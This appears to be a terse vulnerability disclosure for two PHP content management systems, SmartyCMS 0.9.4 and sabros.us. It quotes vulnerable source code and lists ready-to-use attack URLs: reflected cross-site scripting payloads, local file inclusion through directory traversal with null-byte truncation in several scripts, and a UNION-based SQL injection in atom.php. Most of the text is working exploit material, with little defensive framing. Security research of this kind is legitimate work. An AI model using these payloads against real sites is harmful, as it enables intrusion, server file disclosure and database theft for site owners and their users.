SmartyCMS http://sunet.dl.sourceforge.net/project/smartycms/smartycms/0.9.4 build 334/smartycms-0.9.4-334.zip Passive XSS http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&cmsUserRole=1>'><script>alert(121212);</script> ---------------- js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php PHP: $l = (isset($_REQUEST['lang']) ? new PLUG_Lang($_REQUEST['lang']) : new PLUG_Lang($cfg['lang'])); $l->setBlock('ibrowser'); js/tiny_mce/plugins/ibrowser/langs/lang.class.php PHP: function setBlock( $value ) { $this -> block = $value; function getLang() { $this -> lang = $value; function loadData() { global $cfg; include( dirname(__FILE__) . '/' . $this -> lang.'.php' ); LFI mq=off http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=../../../../../../../../../../boot.ini%00 аналогично http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=../../../../../../../../../../boot.ini%00 http://localhost/smartycms-0.9.4-334/js/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=../../../../../../../../../../boot.ini%00 ---------------- config/smartycms.config.php PHP: // url request param name for template call $smartycms['config']['PageCallParamName'] = 'page'; libraries/smarty-cms/Smarty_cms.php PHP: // read default template name from given url param if (!$resource_name && !empty($smartycms['config']['PageCallParamName'])) if ( !empty($_REQUEST[$smartycms['config']['PageCallParamName']]) ) { $page = $_REQUEST[$smartycms['config']['PageCallParamName']]; $ext = strrchr($page, '.'); if($ext !== false) $resource_name = substr($page, 0, -strlen($ext)); else $resource_name = $page; $resource_name .= '.'.$smartycms['config']['TemplateFileExtension']; } libraries/smarty/Smarty.class.php PHP: if ($display && !$this->caching && count($this->_plugins['outputfilter']) == 0) { if ($this->_is_compiled($resource_name, $_smarty_compile_path) || $this->_compile_resource($resource_name, $_smarty_compile_path)) { include($_smarty_compile_path); } LFI mq=off http://localhost/smartycms-0.9.4-334/index.php?page=/boot.ini%00.html ---------------- templates/handler/book_content_handler.php PHP: function book_content_handler($params, &$smarty) { global $smartycms; // create individual chapter id if (!$_GET['chapterid'] || $_GET['chapterid']=="1") $chapterid=time(); else $chapterid=$_GET['chapterid']; // send content to template $smarty->assign("chapterid",$chapterid); $smarty->assign("book_chapter_id","book_chapter_".$chapterid); $smarty->assign("book_content_id","book_content_".$chapterid); } templates/tutorial.tpl PHP: {* Tutorial content block *} {include file="modules/book_content.tpl" pid="smartycms_tutorial"}<br> templates/modules/book_content.tpl PHP: {if $smarty.request.chapterid} <a name="start"></a> <div class="cms_book_headline">{cms id="$book_chapter_id" theme="singleline" pid=$pid title="edit chapter headline"}Please insert here the chapter headline{/cms}</div><br> {cms id="$book_content_id" pid=$pid title="edit chapter content" height="250" smartytags="0"}<div class="cms_book_bodytext">Please insert here the chapter content</div>{/cms}<br><br> {/if} view source http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../../../../../../boot.ini http://localhost/smartycms-0.9.4-334/index.php?page=tutorial&chapterid=../../../../../index.php
cms sabros.us http://sourceforge.net/projects/sabrosus/files/latest pXSS http://localhost/sabrosus/index.php?busqueda=1<ScRiPt >alert(1212);</ScRiPt> http://localhost/sabrosus/index.php?tag=1>"><ScRiPt>alert(1212);</ScRiPt> ------------ atom.php PHP: if (isset($_GET["tag"])) { $navegador = strtolower( $_SERVER['HTTP_USER_AGENT'] ); if (stristr($navegador, "opera") || stristr($navegador, "msie")) { $tagtag = utf8_decode($_GET["tag"]); } else { $tagtag = $_GET["tag"]; } } $sqlStr = "SELECT DISTINCT link.* FROM ".$prefix."sabrosus as link, ".$prefix."tags as tag, ".$prefix."linktags as rel WHERE"; if(isset($tagtag)){ $sqlStr .= " (tag.tag LIKE '$tagtag') AND "; } $sqlStr .= " (tag.id = rel.tag_id AND rel.link_id = link.id_enlace) AND link.privado = 0 ORDER BY link.fecha DESC"; if(isset($cuantos)){ if($cuantos!='todos' && is_numeric($cuantos)){ $sqlStr .= " LIMIT $cuantos"; } if($cuantos!='todos' && !is_numeric($cuantos)){ $sqlStr .= " LIMIT 10"; } } else { $sqlStr .= " LIMIT 10"; } $result = mysql_query($sqlStr,$link); SQL mq=off http://localhost/sabrosus/atom.php?tag=')+union+select+1,version(),3,4,5,6+--+ User-Agent=111
